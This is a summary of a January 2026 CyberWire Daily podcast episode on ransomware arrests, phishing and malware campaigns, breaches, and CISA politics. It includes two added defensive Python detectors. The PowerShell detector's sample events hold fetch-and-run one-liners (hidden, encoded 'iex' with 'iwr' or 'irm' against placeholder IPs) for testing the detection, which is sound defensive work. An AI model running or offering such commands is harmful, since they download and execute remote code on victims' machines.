CyberWire Daily — "Million-dollar hacks and a manhunt."
Date: January 20, 2026
Host: Dave Bittner (N2K Networks)
Guest: Tim Starks (CyberScoop)
Overview
This episode of CyberWire Daily provides a sweeping tour through the latest, most pressing cybersecurity threats and developments: a law enforcement crackdown on a major ransomware group, the launch of a national anti-fraud service in the UK, fresh research on evolving malware campaigns, a notable ransomware-related data breach, and insight on how access brokers fuel cybercrime. The show closes with a lively interview with Tim Starks of CyberScoop, covering the politics and security ironies surrounding high-level US cybersecurity appointments, plus a look at vulnerabilities in government-offered tools and the surprising cyber risks facing the funeral industry.
Key News Stories and Insights
1. Authorities Pursue Black Basta Ransomware Group
00:55–03:02
- Who: Ukrainian and German authorities identify two Ukrainians as members, and put alleged Russian leader Oleg Nefedov on an international wanted list.
- What: Hundreds of organizations extorted globally, with damages in the hundreds of millions. The two suspects focused on breaching networks and cracking stolen password hashes.
- Evidence: Digital devices and cryptocurrency seized, with analysis ongoing. The group's structure and its ties to the Conti and Ryuk ransomware operations had already been exposed by prior leaks.
- Quote:
"Black Basta has operated since at least 2022, extorting hundreds of organizations worldwide and causing hundreds of millions of dollars in damage." – Dave Bittner (01:22)
2. UK’s ‘Report Fraud’ Service Targets Cybercrime
03:03–04:27
- What’s new: City of London Police launch Report Fraud, replacing the criticized Action Fraud system.
- Key features:
- National reporting portal
- Updates for victims whose reports contribute to investigations
- Real-time analytics for actionable intelligence
- Why it matters: Fraud now makes up about half of UK crime and costs billions.
- Quote:
"Report Fraud provides a single national reporting portal, promises follow up updates when reports contribute to investigations, and uses real time analytics to generate actionable intelligence." – Dave Bittner (03:37)
3. Targeted Malware via LinkedIn Private Messages
04:28–05:47
- Findings (ReliaQuest): Sophisticated phishing campaign uses LinkedIn DMs, targeting execs and IT admins.
- Method:
- A WinRAR self-extracting (SFX) archive drops a legitimate PDF reader executable alongside a malicious DLL, which the reader loads via DLL sideloading
- A remote access trojan is then established using open-source penetration-testing tooling
- Commentary: Organizations should treat LinkedIn like email and extend phishing training and controls to social media messaging.
- Quote:
"The campaign highlights how social media remains an overlooked attack surface and urges organizations to apply email-level scrutiny training and controls to platforms like LinkedIn." – Dave Bittner (05:35)
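The first stage above is a WinRAR SFX: a normal Windows executable (the extraction stub) with a RAR archive appended as an overlay. That layout is what lets it pass as "just a PDF" while carrying the sideloaded DLL. The following is an added triage helper, not code from the episode or from ReliaQuest, that recognises that carrier type from raw bytes: it checks for a valid PE header and then for a RAR4 or RAR5 signature sitting after the PE stub. The sample bytes are constructed here (a minimal fake PE skeleton plus a RAR5 magic), not a real malware sample.

```python
import struct

# RAR container signatures (well-known file magic): RAR 1.5-4.x vs RAR 5.0+.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"


def is_pe(data: bytes) -> bool:
    """True if data has a DOS 'MZ' header whose e_lfanew field (offset 0x3C)
    points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_rar(data: bytes):
    """Return (offset, version) of the earliest RAR signature in data, or (None, None)."""
    hits = [(data.find(magic), ver)
            for magic, ver in ((RAR4_MAGIC, "RAR4"), (RAR5_MAGIC, "RAR5"))]
    hits = [h for h in hits if h[0] != -1]
    return min(hits) if hits else (None, None)


def classify(data: bytes) -> dict:
    """Label a blob as 'sfx' (PE carrying a RAR archive), 'pe', 'rar' or 'other'."""
    pe = is_pe(data)
    offset, version = find_rar(data)
    if pe and offset is not None and offset > 0:
        verdict = "sfx"          # executable stub with an archive behind it
    elif pe:
        verdict = "pe"
    elif offset == 0:
        verdict = "rar"          # plain archive, needs WinRAR to open
    else:
        verdict = "other"
    return {"is_pe": pe, "rar_offset": offset, "rar_version": version, "verdict": verdict}


def sample_pe() -> bytes:
    """Constructed stand-in for a PE stub: MZ header, e_lfanew -> 'PE\\0\\0', no real sections."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)   # e_lfanew points at offset 0x80
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 60


def sample_sfx() -> bytes:
    """Constructed stand-in for a WinRAR SFX: the stub above with a RAR5 archive appended."""
    return sample_pe() + RAR5_MAGIC + b"\x00" * 16


if __name__ == "__main__":
    for name, blob in (("sfx", sample_sfx()), ("pe", sample_pe()),
                       ("rar", RAR4_MAGIC + b"\x00" * 8), ("txt", b"hello")):
        print(name, classify(blob))
```

The verdict identifies the carrier, not malice: legitimate WinRAR installers and any PE that embeds an archive will also score "sfx", so use this to route a file to unpacking and inspection of what it extracts (an EXE plus an unsigned DLL of the same base name is the sideloading tell), not as a block decision on its own. A production scanner would also walk the PE section table to confirm the signature lies in the overlay rather than inside a section.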
4. NexShield: Malicious Browser Extension Crash Campaign
05:48–07:08
- Discovery (Huntress): Extension posing as a privacy-focused ad blocker for Chrome and Edge instead crashes the browser repeatedly (a persistent browser denial of service) and uses the crash as the hook for a fake 'crash fix' lure.
- Attack chain:
- On restart, the user is prompted to paste and run fake 'security fix' commands, which launch the PowerShell infection chain
- Deploys Modelo RAT (a Python RAT used for reconnaissance, persistence, and payload delivery)
- Attribution: Threat actor 'Kong Tuk'
- Significance: Shows growing attacker interest in enterprise browser environments.
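Because the NexShield chain depends on a person pasting a PowerShell one-liner after a browser crash, the process telemetry looks distinctive: powershell.exe spawned from explorer.exe or the browser itself, with a hidden window, an encoded or downloaded command, and policy-bypass switches. The following added example (not code from the episode or from Huntress) scores process-creation records against those indicators, decoding any -EncodedCommand argument so the real payload is inspected. The event records, the parent-process set and the documentation-range URLs are constructed for this example; the indicator patterns are this example's own choices, not a published signature set.

```python
import base64
import re

# Command-line indicators typical of paste-and-run PowerShell lures.
# Patterns are this example's own choices; tune to your environment.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:i|in|indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("web_download", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
]
# Parents that mean "a human pasted this": the Run dialog (explorer.exe) or the
# browser that showed the lure. Assumed set for this example.
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe"}


def decode_encoded(cmdline: str) -> str:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) so indicators hidden
    inside it can be matched; returns '' when absent or undecodable."""
    m = dict(INDICATORS)["encoded_command"].search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:              # binascii.Error is a ValueError subclass
        return ""


def analyze(event: dict) -> dict:
    """Score one process-creation record; 'flag' is True at three or more indicators."""
    cmd = event["cmdline"]
    decoded = decode_encoded(cmd)
    text = cmd + "\n" + decoded       # match on both the raw and the decoded command
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    parent = event.get("parent", "").lower()
    if hits and parent in LURE_PARENTS:
        hits.append("parent:" + parent)
    return {"host": event["host"], "indicators": hits, "decoded": decoded,
            "score": len(hits), "flag": len(hits) >= 3}


def triage(events):
    """Return the flagged analyses, highest score first."""
    return sorted((a for a in map(analyze, events) if a["flag"]), key=lambda a: -a["score"])


def _enc(ps: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records (hostnames, parents and IPs are made up;
# 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "svchost.exe",              # scheduled admin task
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1"},
    {"host": "ws02", "parent": "explorer.exe",             # pasted into Win+R after the "crash"
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                + _enc("iex (iwr 'http://198.51.100.7/fix.ps1' -UseBasicParsing)")},
    {"host": "ws03", "parent": "msedge.exe",               # launched from the browser
     "cmdline": 'powershell -w hidden -c "iex(irm https://203.0.113.9/verify)"'},
    {"host": "ws04", "parent": "code.exe",                 # developer, benign
     "cmdline": "powershell.exe -Command Get-ChildItem"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a["host"], a["score"], a["indicators"])
```

The admin task on ws01 carries two of the same switches as the lure but is not flagged: the threshold plus the parent-process check is what keeps routine `-ExecutionPolicy Bypass -File` automation below the line. In practice the same logic runs over Sysmon event 1 or Windows Security event 4688 (with command-line auditing enabled), and the decoded command should be kept in the alert so analysts see the download URL rather than a base64 blob.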
5. Ingram Micro Ransomware & Data Breach
07:09–08:03
- Incident: A ransomware attack in July 2025 exposed data of roughly 42,000 individuals, covering employee and job-applicant records.
- Response: Notifications to affected individuals, credit monitoring offered, and notifications to federal authorities.
- Attribution: The SafePay group claims to have stolen 3.5 TB of data; the claim is unverified.
6. Access Broker Awaits Sentencing for Corporate Credential Sales
08:04–09:00
- Subject: Jordanian national Faras Khali Ahmad Abashiti ("Riz") sold access to at least 50 organizations (May 2023).
- Details: Credentials were sold for cryptocurrency on a cybercrime forum, including to an undercover law enforcement buyer.
- Significance: Illustrates the crucial role of 'access brokers' in broader cybercrime.
- Outcome: Sentencing set for May 2026.
7. Cybersecurity Investment & M&A Highlights
09:01–10:51
- Investments: Seven deals, $350M+ total.
- Notables:
- Torc (Israeli SOC/AI secops) — $140M Series D ($1.2B valuation)
- Novi (AI pen-testing) — $51.5M total across seed, Series A, and debt rounds
- Acquisitions:
- CrowdStrike acquires Seraphic (browser security, Israel) & Signal (US IAM provider) for $1.1B combined
- Takeaway: Intense VC and strategic interest in AI-enhanced security and browser/IAM protection.
Interview: Tim Starks (CyberScoop)
8. Politics and Paradoxes in US Cyber Leadership
13:35–17:46
Sean Plankey's Troubled CISA Nomination
- Context:
- Plankey is surprisingly renominated as CISA director after his initial nomination stalled in the Senate.
- Main obstacles: Not his record, but Senate holds linked to disaster aid and a Coast Guard contractor dispute.
- Key Quotes:
"It's a little surprising to me too, because pretty much his nomination was left for dead by basically everybody I knew." – Tim Starks (14:01)
"The White House has said...they are committed to him. Obviously renominating him suggests that." – Tim Starks (14:10)
"The Republicans from North Carolina are holding him up over disaster aid... Rick Scott from Florida... held up his nomination over a Coast Guard contract for a contractor in his state that got partially canceled." – Tim Starks (15:09)
- Plankey's position: Plankey says it's outside his control:
"His response was kind of like not up to me. It's up to the White House." – Tim Starks (16:31)
- Analysis: The process is gridlocked due to unrelated political fights, not candidate fitness.
Vulnerability Irony in CISA's Secure Software Tool
17:46–20:20
- Story: Security researcher Jeff Williams found a trivial cross-site scripting (XSS) vulnerability in CISA's secure software procurement tool.
- Timeline: The vulnerability remained open for months (September to December 2025) before it was patched.
- Irony: Tool’s purpose is to guide secure software acquisition.
- Quote:
“This was something that could have been fixed in five minutes and that it demonstrated that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
- CISA response: Rated the issue non-critical and eventually fixed it, saying the disclosure process worked; the researcher argues the delay showed a lack of basic diligence.
- Humor:
“Everything’s perfect, as we know. All is well and it’s going to stay well.” – Tim Starks (20:14)
9. Cybercrime Hits Korean Funeral Sector—A Wake-Up Call
21:32–22:49
- Incident: Ransomware attack hits Kyowon Group affiliates; exposes security vacuum in Korea's funeral industry.
- Key Points:
- Firms are not required to obtain information security certification
- Industry holds personal data on ~10M subscribers
- Lawmakers flag need for regulation, as sector is highly vulnerable
- Takeaway: Even “traditional” sectors with substantial data and funds are prime cybercrime targets.
- Comment:
"The funeral industry's security posture appears to be built more on tradition than on modern safeguards." – Dave Bittner (21:40)
Memorable Quotes & Moments
- On political wrangling:
"Why renominate him if you’re not going to do everything you can to get him through?" – Tim Starks (17:41)
- On basic security failings:
“This was something that could have been fixed in five minutes... that they had really nobody doing the kind of work they needed... just basic website stuff.” – Tim Starks (18:35)
- On industry vulnerabilities:
"Ransomware groups favor exactly this combination: steady cash flow, sensitive data, and thin defenses." – Dave Bittner (22:21)
Timestamps
- 00:55 — Black Basta ransomware manhunt
- 03:03 — Launch of 'Report Fraud' in the UK
- 04:28 — LinkedIn RAT phishing campaign
- 05:48 — Malicious browser extension (NexShield) campaign
- 07:09 — Ingram Micro ransomware and breach
- 08:04 — Access broker conviction
- 09:01 — VC funding and M&A headlines
- 13:35 — Tim Starks interview begins
- 14:01 — The mystery of Sean Plankey's renomination
- 18:00 — CISA tool’s ironic vulnerability
- 21:32 — Ransomware in the funeral industry
Tone and Style
The episode blends concise news coverage with wry emphasis on the ironies of cybersecurity, both in government missteps and in overlooked industry targets. Accessible yet sharply insightful, with both technical and strategic dimensions.
For full details and continuing coverage, visit thecyberwire.com.
